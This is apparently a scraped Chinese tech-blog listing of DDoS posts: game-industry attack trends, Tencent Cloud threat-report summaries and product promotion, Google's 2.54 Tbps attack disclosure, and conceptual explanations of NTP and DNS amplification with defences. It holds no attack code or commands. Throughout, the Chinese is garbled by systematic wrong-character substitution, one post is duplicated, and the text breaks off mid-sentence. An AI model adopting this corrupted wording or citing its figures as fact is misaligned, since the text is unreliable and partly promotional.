第二,对于架构层面来说,当真正呈现问题时,要有疾速的调度或热备切换,这是容灾的问题,也能够叫做疾速复原业务的能力; 第三,业余的人干业余的事,当真正影响到企业的生存倒退时,还是要找业余的平安服务团队来解决这个问题。

March 23, 2021 · 1 min · jiezi

关于ddos:游戏出海首破千亿进击路上如何防范DDoS风险

近年来,随着国内游戏市场竞争日益强烈,游戏发行商纷纷将眼光瞄准了空间更为广大的海内市场,游戏出海俨然曾经成为了中国文化内容出海的主力军。 01游戏出海首破千亿大关作为没有国界的文化内容产品,游戏出海具备人造的劣势。过来几年,在行业上下游的共同努力下,国内游戏出海获得了令人瞩目的问题,市场占比继续晋升。依据手游及利用情报平台Sensor Tower公布的数据,2016-2019年国内出品游戏占海内市场比率从12.2%晋升到了17.6%,移动游戏的占比也从12.7%晋升到了15.2%。 刚刚过来的2020年,在疫情推动下,寰球“宅经济”升温。游戏作为消费者居家娱乐的首选形式之一,需求量不断扩大。国内游戏出海抓住这一重大时机,发明出了新的里程碑。 依据《2020年中国游戏产业报告》,2020年中国自主研发游戏海内市场理论销售收入达154.50亿美元,首次冲破千亿人民币大关,比2019年减少了38.55亿美元,同比增长33.25%,持续放弃了高速增长态势。 目前,海内疫情仍在继续,寰球累计确诊人数曾经冲破1亿,现存确诊人数靠近3000万。不难预感,2021年寰球“宅经济”仍将放弃在高位状态,国内游戏出海也将继续迎来利好。 02DDoS攻打或是最大隐忧然而国内游戏出海的大好态势下,危险也如影随形。 始终以来,游戏行业都是DDoS攻打的重灾区,游戏厂商蒙受DDoS攻打简直曾经成为常态。2019年8月底,经典游戏《魔兽世界》念旧服上线不到一周即受到歹意DDoS攻打,几十万玩家无奈登陆游戏。2020年4月,国外出名游戏厂商EA接连受到屡次DDoS攻打,导致《FIFA 20》、《战地5》、《Apex英雄》等多款热门游戏无奈玩耍。12月,暴雪游戏平台继续受到一系列大型歹意DDoS攻打……DDoS攻打不仅重大影响玩家体验和留存,也会给游戏发行商造成微小的经济损失。 游戏厂商之所以频频成为DDoS攻打的指标,次要有三方面起因: 首先,游戏行业的攻打门槛低,老本十分低廉,单次攻打老本甚至低至数元。随着攻击点增多、攻打伎俩多样化,传统动态防护策略难以产生成果,进一步加大了攻防两端的不均衡。 其次,游戏产品生命周期很短,一款游戏从出世到沦亡,往往只有半年工夫。企业一旦受到攻打,为确保游戏稳固经营不得不疾速做出退让,以致巧取豪夺的成功率绝对更高。 再次,游戏行业对连续性要求很高,须要7*24在线。如果受到DDoS攻打,很容易会造成大量的玩家散失。行业内不乏游戏公司受到DDoS攻打后,玩家数量在2-3天内从几万人掉到几百人的例子。 此外,行业内的强烈竞争,以及玩家舞弊或者宣泄不满,也在肯定水平上加剧了游戏企业面临的DDoS攻打危险。 03复合型攻打成为常态2020年,随着DDoS攻打的量级加大、手法增多,出海游戏厂商面临着更加严厉的安全形势。 依据腾讯平安最新公布的《2020年腾讯云DDoS威逼白皮书》,2020年DDoS攻打次数创下历史新高,同比增幅高达135%,是增幅最大的一年。其中,游戏行业在整体DDoS攻打中的占比超过7成。 与此同时,海内攻打也呈现了大幅增长,攻打次数和增速均为历史之最,其中欧洲和北美是海内DDoS攻打较为密集的区域。这对出海游戏厂商来说,无疑是一大挑战。 攻打量级晋升之外,新的攻打手法也不断涌现,CoAP、WS-DD和ARMS等新型UDP反射被大量用于攻打游戏业务。相比传统UDP反射放大攻打,这类攻打能够无效穿透粗粒度的检测和防护。 为了谋求更好的攻打成果,攻击者一直寻找更多更强的攻打手法,将现有攻打手法组合也成为攻击者独特的抉择。针对这种多层次的组合攻打,只有更精细化的检测和防护策略,能力有针对性地进攻其威逼。 《白皮书》指出,海内DDoS攻打黑产在蒙受司法重击后迅速复苏,游戏企业出海必须器重DDoS攻打威逼,提前准备应答计划。 腾讯云T-Sec DDoS防护具备笼罩寰球的秒级响应提早和T级荡涤能力,能够无效进攻IP层到应用层的各类型DDoS攻打场景,目前曾经为游戏、互联网、视频、金融、政府等诸多行业的客户提供了平安保障。2020年,游族网络基于腾讯平安DDos防护,为海内游戏筑起了扎实的防护网,可高效抵挡百G级别的DDoS攻打,守护千万玩家稳固的游戏体验。 销售收入胜利冲破千亿大关后,国内游戏出海正式步入要害机遇期。乘“宅经济”东风的同时,如何胜利进攻DDoS攻打威逼,是国内游戏企业是否站稳脚跟持续扩充市场的要害。游族网络无疑为国内游戏厂商出海提供了一个可供学习的样本。 关注产业平安TALK公众号 回复DDoS白皮书 获取《2020年腾讯云DDoS威逼白皮书》完整版报告,全面洞悉2020年DDoS攻防态势。

February 5, 2021 · 1 min · jiezi

关于ddos:腾讯安全2020年DDoS威胁报告海外攻击大幅增长游戏行业是重灾区

随着产业数字化降级减速,针对云上企业的DDoS攻打一直出现出新的变动。 近日,腾讯平安公布《2020年DDoS威逼报告》,在回顾2020年重大DDoS攻打事件的根底上,对整体态势作了剖析,并总结出几大趋势——攻打次数同比翻番、超大攻打连增两年、Q3攻打最为剧烈、海内攻打大幅增长、游戏行业攻打次数和占比均翻新高。此外,《报告》还结合实际案例给企业防护DDoS攻打提供了实用性倡议。 《报告》重点已划好,速读: UDPFLOOD仍是相对主力 反射攻打继续扩充 以UDP反射放大攻打为主的UDPFLOOD依然是相对主力,占比高达88%。往年Q2以来,TCP反射攻打手法越来越沉闷,尤其是8月份以来增长趋势显著。 TCP反射攻打之外,HTTP/HTTPS应用层攻打也呈现了大幅增长,攻打峰值动辄上百万QPS。 欧洲、北美成新攻打热点 游戏行业是重灾区 场景方面,UDP反射和TCP反射奉献了最多的攻打源,别离占比51%和34%。地区方面,中美两国遥遥领先于俄罗斯、巴西和日本,是攻打源数量最多的国家,欧洲和北美成为了海内新的攻打热点。动机方面,歹意玩家舞弊和黑客团伙巧取豪夺排在前两位,别离占比46%和13%,游戏行业是攻打的重灾区,攻打次数占比高达79%。 此外,海内DDoS攻打黑产正在复苏,游戏企业出海必须器重DDoS攻打威逼,提前准备应答计划。 腾讯云DDoS防护解决方案 助力企业数字化转型降级 随着企业减速上云,DDoS曾经成为寰球企业的难题。腾讯云依靠十余年的自研业务平安实际,打造了集DDoS攻打检测和进攻于一身的平安产品——腾讯云DDoS防护解决方案,为企业一站式解决各类DDoS攻打。 面对DDoS攻打技术的降级,腾讯云DDoS防护继续迭代算法,通过IP画像、行为模式分析、Cookie挑战等多维算法,联合弱小的AI智能引擎和多方位的威逼情报,根据威逼变动继续更新防护算法,助力企业无效抵挡新的平安威逼。

January 11, 2021 · 1 min · jiezi

关于ddos:谷歌公布有史以来最大-DDoS-攻击速度高达-254-Tbps

技术编辑:徐九丨公布自:思否编辑部 近日,谷歌云团队披露了一次之前未公开过的 DDoS 攻打,该攻打早在 2017 年 9 月就以谷歌服务为指标,攻击速度达到 2.54 Tbps,成为迄今为止有记录以来最大的 DDoS 攻打。 继续 6 个月,峰值高达 2.54 Tbps谷歌云的平安可靠性工程师达米安 · 门舍尔(Damian Menscher)示意,这次攻打继续了 6 个月,该组织利用了多种形式来攻打谷歌的服务器,而 2.54 Tbps 则是这六个月中的 DDoS 峰值。 “攻击者利用几个网络坑骗了 167 个 Mpps (每秒数百万个数据包)到 180,000 个裸露的 CLDAP、 DNS 和 SMTP 服务器,而后这些服务器会给咱们发送大量的响应,” Menscher 说。 在同一时间公布的另一份报告中,谷歌威逼剖析小组(TAG)示意,这次攻打是由一个国家反对的威逼组织施行的。 随着带宽减少,DDoS 攻打或将日益加剧这是一个三年前的 DDoS 攻打事件,谷歌团队之所以当初才公布出来,是因为他们“心愿进步人们对国家黑客组织滥用 DDoS 攻打趋势的认知”。 随着互联网带宽的减少,DDoS 攻打日益增长是一个不争的事实。据数据中心公司 Equinix 预测,到 2023 年,寰球互连带宽将减少约 45% (约 16300 Tbps)。 而技术的倒退永远都是一柄双刃剑,谷歌颁布的这个案例,就通知了咱们在现有网络环境下,网络攻击者所能造成的影响水平。心愿能够真的提起大家对于网络安全的器重,推动网络安全设施的建设。

October 19, 2020 · 1 min · jiezi

关于ddos:腾讯云发布上半年DDoS威胁报告百G以上超大流量攻击数量翻番

因为疫情带来的物理隔断,各行各业的数字化过程按下“减速键“,大量传统行业拥抱产业互联网,将业务移到线上。但与此同时,集中的线上业务暴发也带来更加简单和多维的平安挑战。其中,DDoS攻打仍然困扰着大量企业。 近日,腾讯云公布《2020年上半年DDoS威逼报告》(以下简称《报告》),通过对威逼态势、攻打手法、攻打趋势等多维度的洞察,借势上半年DDoS攻打最新趋势,全面披露了云平安黑灰产的新变动、企业面临的重点威逼以及攻打趋势,助力云上企业更好应答平安危险。 关注腾讯平安(公众号TXAQ2019) 回复DDoS威逼报告获取原报告 业界攻打峰值流量高达2.3T 百G以上攻打次数同比翻番 据《报告》显示,2020上半年业界最大DDoS攻打峰值流量已达到2.3T,意味着2Tb级攻打的时代正式降临;云上DDoS攻打次数大幅增长45%、百G以上攻打次数同比翻番,DDoS攻打形势严峻,企业面临日益频繁的DDoS攻打。 在多种DDoS攻打手法中,应用层攻打频次出现显著的大幅晋升,并创下四项“之最”记录。《报告》指出,应用层攻打持续时间最长达到27天、单次攻打最大累计攻打申请831亿次、峰值HTTPS申请量最多超260万qps、单次攻打最大肉鸡数量达45万。 不同于传统DDoS攻打,近年来衰亡的应用层攻打则会伪装成失常的流量,甚至和失常业务一样,绕过进攻设施,造成企业服务器不可用,业务卡顿等,这对企业进攻造成了极大的困扰。 攻打手法变化多端 UDPFLOOD或成黑客“终极武器” 随着黑客技术的日渐进步,黑产的资源积攒、技术能力和软硬件配置显著晋升,对应用层防护带来了不小的艰难。 在所有攻打中,UDPFLOOD仍是黑客最最次要的攻打手法,超过整体散布的80%。其中,SSDP反射和NTP反射攻打手法成为DDoS攻打最“时尚”的抉择,占比别离为34%和29%,为企业攻防工作提出了新的挑战。 从攻打指标的行业散布来看,游戏、网络服务、直播仍是黑客最受“青眼”的指标,与以往的散布根本保持一致,游戏行业和网络服务行业占比最多。与今年不同的是,2020年上半年直播和电商卖货两大畛域的DDoS攻打占比,呈现出了截然相同的变化趋势——直播行业的DDoS攻打频率和量级猛涨,电商行业则有肯定的降落,这可能与疫情期间少数人抉择闭门在家有肯定分割。 高效助力企业抵挡攻打 腾讯云打造一站式DDoS防护解决方案 作为国内较早钻研DDoS攻打的平安厂商之一,腾讯云打造了集DDoS攻打检测和进攻于一身的平安产品——腾讯云DDoS防护解决方案,为企业一站式解决各类DDoS攻打。腾讯云DDoS防护继续迭代算法,通过IP画像、行为模式分析、Cookie挑战等多维算法,联合弱小的AI智能引擎和多方位的威逼情报,根据威逼变动继续更新防护算法,无效抵挡新的平安威逼。 在策略抉择上,腾讯云DDoS防护具备极高的灵活性,不仅反对基于黑白名单、ACL、正则规定、模式匹配等策略进行荡涤防护,还预设了多套策略模板供用户抉择,特设专家模式,实现细粒度防护策略调整,实现了从攻打发动到攻打流量荡涤的秒级检测、秒级响应。 在实际利用方面,腾讯云联结平安平台部宙斯盾等多个团队的平安专家,为全国两会、广交会等多个重要会议提供7*24小时全方位网络安全防护,保障期间业务平安稳固经营。 腾讯云DDoS防护服务播种了行业的宽泛认可和关注,曾先后获评2019年度中国互联网“当先平安产品”、入选Forrester的DDoS平安防护类别寰球云服务商举荐名单等诸多荣誉。随着“新基建”步调的放慢,腾讯云DDoS防护将继续依靠20年继续服务10亿用户的平安防护教训,及寰球顶尖平安专家领衔的人才劣势,继续为企业用户提供全面、牢靠的抗D服务,助力企业云上平安建设。 戳长图,理解DDoS攻打新变动???? ????

August 6, 2020 · 1 min · jiezi

关于ddos:DDOS的危害日趋严重

分布式拒绝服务(DDoS——Distributed Denial of Service)攻打随着IT及网络的倒退演进至今,早已脱离了晚期纯正黑客行为的领域,进而造成了残缺的彩色产业链,其危害更是远超以往。趋势与挑战 DDoS攻打局势更加严厉以后DDoS攻打进攻局势更加严厉,单次攻打流量超过500G的案例曾经产生,攻打数量较2007年减少20倍,寰球僵尸主机规模曾经超过3000万台……随处能够取得的攻打工具,宏大的僵尸网络群体,动员一次DDoS攻打不再须要任何黑客技术门槛,只须要3步(下载攻打工具、购买僵尸主机,动员攻打)即可实现一次攻打。 DDoS攻打由流量型攻打转向应用型和挪动型攻打 过来DDoS攻打以Flood型攻打为主,更多的针对运营商的网络和基础架构;而以后的DDoS攻打越来越多的是针对具体利用和业务,如:针对某个挪动APP利用、企业门户利用、在线购物、在线视频、在线游戏、DNS、Email等,攻打的指标更加宽泛,单次攻打流量小成本低,挪动型智能终端攻打传统进攻形式影响失常业务、攻击行为更为简单和仿真,造成DDoS攻打检测和进攻更加艰难。 业务中断影响企业失常经营 业务零碎频遭DDoS攻打将企业推向两难地步,重大的影响着企业业务的失常经营。一方面,业务中断造成企业的形象受损,客户散失,a收益升高等,尤其是对电商、网游、门户类小型互联网企业;另一方面,企业若本人建设DDoS防护系统,会给这些“小本经营”企业带来微小投资和保护压力,重大的影响着企业业务的失常经营。 DDoS攻打造成IDC客户散失 一个业务零碎蒙受DDoS攻打,(113资讯网)攻打流量挤占整个IDC带宽资源,影响其余租户的业务零碎;数据中心中服务器被黑客管制,沦为僵尸,歹意流量充斥着数据中心的带宽资源,甚至给数据中心带来法律危险;平安问题导致IDC租户散失,竞争力降落、经营成本增加等一系列的负面影响,重大的影响IDC业务经营和收益。

July 29, 2020 · 1 min · jiezi

关于ddos:DDOS的危害日趋严重

分布式拒绝服务(DDoS——Distributed Denial of Service)攻打随着IT及网络的倒退演进至今,早已脱离了晚期纯正黑客行为的领域,进而造成了残缺的彩色产业链,其危害更是远超以往。趋势与挑战 DDoS攻打局势更加严厉以后DDoS攻打进攻局势更加严厉,单次攻打流量超过500G的案例曾经产生,攻打数量较2007年减少20倍,寰球僵尸主机规模曾经超过3000万台……随处能够取得的攻打工具,宏大的僵尸网络群体,动员一次DDoS攻打不再须要任何黑客技术门槛,只须要3步(下载攻打工具、购买僵尸主机,动员攻打)即可实现一次攻打。 DDoS攻打由流量型攻打转向应用型和挪动型攻打 过来DDoS攻打以Flood型攻打为主,更多的针对运营商的网络和基础架构;而以后的DDoS攻打越来越多的是针对具体利用和业务,如:针对某个挪动APP利用、企业门户利用、在线购物、在线视频、在线游戏、DNS、Email等,攻打的指标更加宽泛,单次攻打流量小成本低,挪动型智能终端攻打传统进攻形式影响失常业务、攻击行为更为简单和仿真,造成DDoS攻打检测和进攻更加艰难。 业务中断影响企业失常经营 业务零碎频遭DDoS攻打将企业推向两难地步,重大的影响着企业业务的失常经营。一方面,业务中断造成企业的形象受损,客户散失,a收益升高等,尤其是对电商、网游、门户类小型互联网企业;另一方面,企业若本人建设DDoS防护系统,会给这些“小本经营”企业带来微小投资和保护压力,重大的影响着企业业务的失常经营。 DDoS攻打造成IDC客户散失 一个业务零碎蒙受DDoS攻打,(113资讯网)攻打流量挤占整个IDC带宽资源,影响其余租户的业务零碎;数据中心中服务器被黑客管制,沦为僵尸,歹意流量充斥着数据中心的带宽资源,甚至给数据中心带来法律危险;平安问题导致IDC租户散失,竞争力降落、经营成本增加等一系列的负面影响,重大的影响IDC业务经营和收益。

July 29, 2020 · 1 min · jiezi

DDoS-攻击是什么-如何防止DDos攻击

上周出名博主阮一峰的博客被DDOS攻打,导致网站无法访问而被迫迁徙服务器的事件,引起了宽广网友的关注及气愤,包含小编的集体博客也曾承受过DDOS的“洗礼”,对此感同身受。所以,本文咱们一起来理解下DDOS攻打并分享一些在肯定水平范畴内的应答计划。 对于DDOS攻打分布式拒绝服务(DDoS:Distributed Denial of Service)攻打指借助于客户/服务器技术,将多个计算机联结起来作为攻打平台,对一个或多个指标动员DDoS攻打,从而成倍地进步拒绝服务攻打的威力。通常,攻击者将攻打程序通过代理程序安装在网络上的各个“肉鸡”上,代理程序收到指令时就动员攻打。 (DDOS攻打示意图) 随着网络技术倒退,DDOS攻打也在一直进化,攻打老本越来越低,而攻打力度却成倍加大,使得DDOS更加难以防备。比方反射型DDoS攻打就是绝对高阶的攻击方式。攻击者并不间接攻打指标服务IP,而是通过伪造被攻击者的IP向寰球非凡的服务器发申请报文,这些非凡的服务器会将数倍于申请报文的数据包发送到那个被攻打的IP(指标服务IP)。 DDOS攻打让人望而却步,它能够间接导致网站宕机、服务器瘫痪,对网站乃至企业造成严重损失。而且DDOS很难防备,能够说目前没有根治之法,只能尽量晋升本身“抗压能力”来缓解攻打,比方购买高防服务。 DDoS攻打简介分布式拒绝服务攻打(DDoS攻打)是一种针对指标零碎的歹意网络攻击行为,DDoS攻打常常会导致被攻击者的业务无奈失常拜访,也就是所谓的拒绝服务。 常见的DDoS攻打包含以下几类: 网络层攻打:比拟典型的攻打类型是UDP反射攻打,例如:NTP Flood攻打,这类攻打次要利用大流量拥塞被攻击者的网络带宽,导致被攻击者的业务无奈失常响应客户拜访。传输层攻打:比拟典型的攻打类型包含SYN Flood攻打、连接数攻打等,这类攻打通过占用服务器的连接池资源从而达到拒绝服务的目标。会话层攻打:比拟典型的攻打类型是SSL连贯攻打,这类攻打占用服务器的SSL会话资源从而达到拒绝服务的目标。应用层攻打:比拟典型的攻打类型包含DNS flood攻打、HTTP flood攻打、游戏假人攻打等,这类攻打占用服务器的利用解决资源极大的耗费服务器解决性能从而达到拒绝服务的目标。DDoS攻打缓解最佳实际倡议阿里云用户从以下几个方面着手缓解DDoS攻打的威逼: 放大裸露面,隔离资源和不相干的业务,升高被攻打的危险。优化业务架构,利用公共云的个性设计弹性伸缩和灾备切换的零碎。服务器平安加固,晋升服务器本身的连接数等性能。做好业务监控和应急响应。DDOS攻打应答策略这里咱们分享一些在肯定水平范畴内,可能应答缓解DDOS攻打的策略办法,以供大家借鉴。 1.定期检查服务器破绽定期检查服务器软件安全漏洞,是确保服务器平安的最根本措施。无论是操作系统(Windows或linux),还是网站罕用应用软件(mysql、Apache、nginx、FTP等),服务器运维人员要特地关注这些软件的最新破绽动静,呈现高危破绽要及时打补丁修补。 2.暗藏服务器实在IP通过CDN节点直达减速服务,能够无效的暗藏网站服务器的实在IP地址。CDN服务依据网站具体情况进行抉择,对于一般的中小企业站点或集体站点能够先应用收费的CDN服务,比方百度云减速、七牛CDN等,待网站流量晋升了,需要高了之后,再思考付费的CDN服务。 其次,避免服务器对外传送信息透露IP地址,最常见的状况是,服务器不要应用发送邮件性能,因为邮件头会透露服务器的IP地址。如果非要发送邮件,能够通过第三方代理(例如sendcloud)发送,这样对外显示的IP是代理的IP地址。 3.敞开不必要的服务或端口这也是服务器运维人员最罕用的做法。在服务器防火墙中,只开启应用的端口,比方网站web服务的80端口、数据库的3306端口、SSH服务的22端口等。敞开不必要的服务或端口,在路由器上过滤假IP。 4.购买高防进步承受能力该措施是通过购买高防的盾机,进步服务器的带宽等资源,来晋升本身的接受攻击能力。一些出名IDC服务商都有相应的服务提供,比方阿里云、腾讯云等。但该计划老本估算较高,对于一般中小企业甚至集体站长并不适合,且不被攻打时造成服务器资源闲置,所以这里不过多论述。 5.限度SYN/ICMP流量用户应在路由器上配置SYN/ICMP的最大流量来限度SYN/ICMP封包所能占有的最高频宽,这样,当呈现大量的超过所限定的SYN/ICMP流量时,阐明不是失常的网络拜访,而是有黑客入侵。晚期通过限度SYN/ICMP流量是最好的防备DOS的办法,尽管目前该办法对于DdoS成果不太显著了,不过依然可能起到肯定的作用。 6.网站申请IP过滤除了服务器之外,网站程序自身平安性能也须要晋升。以小编本人的集体博客为例,应用cms做的。系统安全机制里的过滤性能,通过限度单位工夫内的POST申请、404页面等拜访操作,来过滤掉次数过多的异样行为。尽管这对DDOS攻打没有显著的改善成果,但也在肯定水平上加重小带宽的歹意攻打。 2.3 部署DNS智能解析通过智能解析的形式优化DNS解析,能够无效防止DNS流量攻打产生的危险。同时,建议您将业务托管至多家DNS服务商。 屏蔽未经请求发送的DNS响应信息抛弃疾速重传数据包启用TTL抛弃未知起源的DNS查问申请和响应数据抛弃未经请求或突发的DNS申请启动DNS客户端验证对响应信息进行缓存解决应用ACL的权限利用ACL,BCP38及IP信用性能2.4 提供余量带宽通过服务器性能测试,评估失常业务环境下所能接受的带宽和申请数。在购买带宽时确保有肯定的余量带宽,能够防止蒙受攻打时带宽大于失常使用量而影响失常用户的状况。 3. 服务平安加固对服务器上的操作系统、软件服务进行平安加固,缩小可被攻打的点,增大攻打方的攻打老本: 确保服务器的系统文件是最新的版本,并及时更新零碎补丁。对所有服务器主机进行查看,分明访问者的起源。过滤不必要的服务和端口。例如,对于WWW服务器,只凋谢80端口,将其余所有端口敞开,或在防火墙上设置阻止策略。限度同时关上的SYN半连贯数目,缩短SYN半连贯的timeout工夫,限度SYN/ICMP流量。仔细检查网络设备和服务器零碎的日志。一旦呈现破绽或是工夫变更,则阐明服务器可能受到了攻打。限度在防火墙外进行网络文件共享。升高黑客截取系统文件的机会,若黑客以特洛伊木马替换它,文件传输性能将会陷入瘫痪。充分利用网络设施爱护网络资源。在配置路由器时应思考针对流控、包过滤、半连贯超时、垃圾包抛弃、起源伪造的数据包抛弃、SYN阀值、禁用ICMP和UDP播送的策略配置。通过iptable之类的软件防火墙限度疑似歹意IP的TCP新建连贯,限度疑似歹意IP的连贯、传输速率。4. 业务监控和应急响应4.1 关注根底DDoS防护监控当您的业务蒙受DDoS攻打时,根底DDoS默认会通过短信和邮件形式收回告警信息,针对大流量攻打根底DDoS防护也反对电话报警,建议您在承受到告警的第一工夫进行应急解决。 5.1 Web利用防火墙(WAF)针对网站类利用,例如常见的http Flood(CC攻打)攻打,能够应用WAF能够提供针对连贯层攻打、会话层攻打和应用层攻打进行无效进攻。倡议应用阿里云Web利用防火墙服务。 5.2 DDoS防护包5.3 DDoS高级防护针对大流量DDoS攻打,倡议应用阿里云高防IP服务。 该当防止的事项DDoS攻打是业内公认的行业公敌,DDoS攻打不仅影响被攻击者,同时也会对服务商网络的稳定性造成影响,从而对处于同一网络下的其余用户业务也会造成损失。 计算机网络是一个共享环境,须要多方独特保护稳固,局部行为可能会给整体网络和其余租户的网络带来影响,须要您留神: 防止应用阿里云产品机制搭建DDoS防护平台防止开释处于黑洞状态的实例防止为处于黑洞状态的服务器间断更换、解绑、减少SLB IP、弹性公网IP、NAT网关等IP类产品防止通过搭建IP池进行进攻,防止通过摊派攻打流量到大量IP上进行进攻防止利用阿里云非网络安全进攻产品(包含但不限于CDN、OSS),前置本身有攻打的业务防止应用多个账号的形式绕过上述规定小结目前而言,DDOS攻打并没有最好的根治之法,做不到彻底进攻,只能采取各种伎俩在肯定水平上减缓攻打挫伤。所以平时服务器的运维工作还是要做好根本的保障,并借鉴本文分享的计划,将DDOS攻打带来的损失尽量升高到最小。 原文地址:http://tencent.yundashi168.com/567.html

July 15, 2020 · 1 min · jiezi

为什么说游戏行业是DDOS的攻击重灾区

继经典游戏《魔兽世界》怀旧服被DDOS攻击后,又一款大型火爆的网络战术射击类游戏《彩虹六号:围攻》遭受到DDoS攻击,导致游戏的正常运营受到了干扰。一直都说游戏是DDOS攻击的重灾区,接连暴雪、育碧这类行业里的大佬都中招,更不用说一些中小型企业了,很多刚上线的小游戏甚至因为DDoS直接挂掉。有报告显示,目前游戏行业仍是DDOS的首要攻击目前。数据指出,在2019上半年遭受到DDOS攻击的行业中,游戏行业占到了42%。并且2019上半年DDOS攻击呈现次数多、强度高、手法心、来源广等特点,TB级的攻击都屡见不鲜。 截止2018年,中国的游戏市场以275.47亿美元的收入超过了美国和日本,成为了全球收入最高的游戏市场。暴利原因使游戏产业当仁不让地成为了DDoS的最佳攻击目标。也是因为发展火爆,竞争异常激烈,对同行发起恶意攻击也导致了DDoS数量的与日俱增。 DDoS攻击打法在不断“进化”,基本的静态防护策略难以招架先进的花式混合攻击。而游戏对服务器的流畅度要求非常高,攻击者甚至不需要花大力气完全打垮服务器,少量成本就可以造成服务器拥堵延迟,玩家频繁卡顿、延迟、掉线,这糟糕的体验就已经让企业输不起了。 DDoS攻击产业链的形成也无疑大幅降低了发动DDoS攻击的门槛。腾讯安全《报告》中披露了DDoS链条化的操作——黑客搭建攻击站点,每月仅需成本数千元;将站点出租用以发动攻击,每月的收入可以达到数十万元;而部分黑灰产团伙若自行购买攻击服务,每月也只需支付数百元金额,向企业发起勒索,索要的赎金每次可至数万元。 现今的游戏生命周期都很短,流水量大、变现速度快,企业必须在短期内快速推高并盈利;但同时游戏几乎都是7*24*365随时在线,对网络和服务器持续性的要求很高。一旦遭受攻击,前期的宣传投入直接打水漂,用户数量和游戏口碑立马暴跌,企业在面对攻击时如果没有事前防御措施,基本来不及应对,后期也很难赢回玩家和品牌,所以选择支付“保护费”直接了事的公司不在少数,这种情况也助长了攻击者对游戏的“青睐”。 游戏行业随着时代的发展有着突飞猛进的变化,尤其是互联网时代智能手机的普及,让游戏行业发展上了一个新的台阶。DDoS无疑已经成为重创游戏产业最主要也最有效的手段,游戏厂商更应该树立安全意识,建立安全机制,主动去应对和降低网络攻击给企业带来的损失。

October 14, 2019 · 1 min · jiezi

浅谈DNS放大攻击的工作原理以及防御措施

DDOS分布式拒绝服务,主要是针对目标系统的恶意网络攻击行为,导致被攻击者的业务无法正常访问。相信各位站长对于DDOS已经是耳熟能详,倒背如流了的境界了,但是对于不和网络相关工作的人员或者是一些企业网站运维人员就不见得可以分辨出DDOS的攻击类型。在前面小编讲了关于NTP放大攻击的操作流程预计防御措施。那么这次主要分享下DNS放大攻击的操作流程以及防御措施。 DNS放大攻击与NTP放大攻击是相似的,但相比NTP放大频率DNS放大频率更高。一般攻击者会利用僵尸网络中的被控主机伪装成被攻击主机,然后设置成特定的时间点连续向多个允许递归查询的DNS服务器发送大量DNS服务请求,然后让其提供应答服务,应答数据经DNS服务器放大后发送到被攻击主机,形成大量的流量攻击,耗尽服务器的资源,导致其无法提供正常服务甚至瘫痪。 DNS放大攻击工作原理: 基本上大部分的放大攻击是攻击者通过许多请求然后将其放大以此来消耗目标Web资源间的带宽。通常黑客利用DNS服务器放大攻击的特性,使用受损的被控僵尸主机将带有欺骗性IP地址,然后利用DNS服务器向被攻击者返回查询的结果。通常查询应答数据包会比查询请求数据包大数倍。导致被攻击者的源服务器因为泛滥的流量而变得不堪重负,最终导致拒绝服务。 DNS放大攻击的防御措施: 1.正确配置防火墙和网络容量;2.增大链路带宽;3.限制DNS解析器仅响应来自可信源的查询或者关闭DNS服务器的递归查询;4.使用DDoS防御产品,将入口异常访问请求进行过滤清洗,然后将正常的访问请求分发给服务器进行业务处理。 最近金融方面的一些小型企业用户对墨者安全反映说遭到了DDoS攻击,因此建议这类客户对自己的网络基础设施进行全方面的排查,安装最新补丁。对服务器各个协议的配置进行排查,禁用可能会被攻击工具利用的服务。提前做好防护,避免潜在危险。

July 13, 2019 · 1 min · jiezi

浅谈DDOS中NTP放大攻击的操作过程以及防御措施

在诸多的DDoS攻击事件中,放大攻击的流行度占了百分之五十左右,攻击难度系数只是占中间部分,但它的影响力较大。这意味着它的防护和缓解比较复杂。那么就有人想要知道什么是NTP放大攻击?NTP的防御措施是怎么样的呢?接下来小编我就分享下NTP放大攻击的操作过程以及防御措施。 那首先就要知道什么是NTP呢?NTP协议(network time protocol)是计算机时间同步化的一种协议,它可以使计算机与时钟源进行同步化并且提高精准度的时间校正,它主要是采用层次化时间的分布模型。网络体系结构的组成是由主时间服务器、从时间服务器和客户机,主时间服务器主要布置在根节点,负责与高精度时间源进行同步,为其他节点提供时间服务,各客户端由从时间服务器经主服务器获得时间同步。 其次NTP放大攻击原理是什么?NTP协议是基于UDP协议的123端口进行通信,但是由于UDP协议的无连接性具有不安全性的缺陷,攻击者就会利用NTP服务器的不安全性能漏洞发起DDoS攻击。攻击者攻击的步骤是先寻找攻击对象或者互联网中支持NTP放大攻击的服务器资源;然后通过伪造IP地址向NTP服务器发送monlist的请求报文,为了增加攻击的强度,monlist指令会监控响应 NTP 服务器并且将其返回进行时间同步的最近多个客户端的IP地址,通常NTP服务器与大量的客户端进行交互时,一个不超过64字节的请求数据包可以触发100个482个字节响应的数据包,因此它具有放大数百倍的功能。从而这些大流量就会阻塞网络,导致网络不通,造成了分布式拒绝服务。 然后NTP放大攻击的防御措施是:1.对NTP服务器进行合理的管理和配置,将全部的NTP服务软件升级到最新的版本;2.在配置文件中添加noquery参数来限制客户端的monlist等信息查询请求;3.通过防火墙对UDP试用的123端口进行限制,只允许NTP服务于固定IP进行通信;4.运用足够大的带宽,硬抗NTP服务产生的放大型流量攻击。5.使用DDoS防御产品,将入口异常访问请求进行过滤清洗,然后将正常的访问请求分发给服务器进行业务处理。

July 12, 2019 · 1 min · jiezi

分享DDOS防御过程中需要了解的技术手段

在DDOS防护过程中,流量清洗是必不可少的技术操作。那么精准的流量清洗具体是通过什么样的方式实现的呢?其中会有多种的技术方式辨识。昨天给大家分享了流量清洗过程中必要的技术手段中的三个,攻击特征匹配、IP信誉检查、协议完整性检测。今天的内容主要分享速度检查与限制、TCP代理和验证、客户端真实性验证的技术手段。 1、通过对请求数据包发送的速度检查与限制来进行清洗。一部分攻击在数据包上是没有特别明显的攻击特性,同时也没有办法进行特征匹配。但在请求数据包发送的频率和速度上会有着明显的差异。比如在受到SSL DDoS攻击时,会在同一个SSL会话中进行加密密钥的多重协商。正常情况下是不会反复多重协商加密密钥的。所以在流量清洗的时候,如果发现SSL会话中的密钥协商次数超过了特定的阈值,会直接中断这个会话并且把来源加入黑名单中。或者是慢速的POST请求攻击时,客户端和服务器之间会以低速率进行互相数据传输。在清洗过程中发现HTTP请求长时间没有完成传输,就会中断会话,这种一般是通过速度检查和限制来进行清洗的。相比UDP洪水攻击等是没有明显的特征,此种是通过大流量攻击,流量清洗的缓解技术是限制流量速度。 2、针对TCP协议代理和验证:如SYN 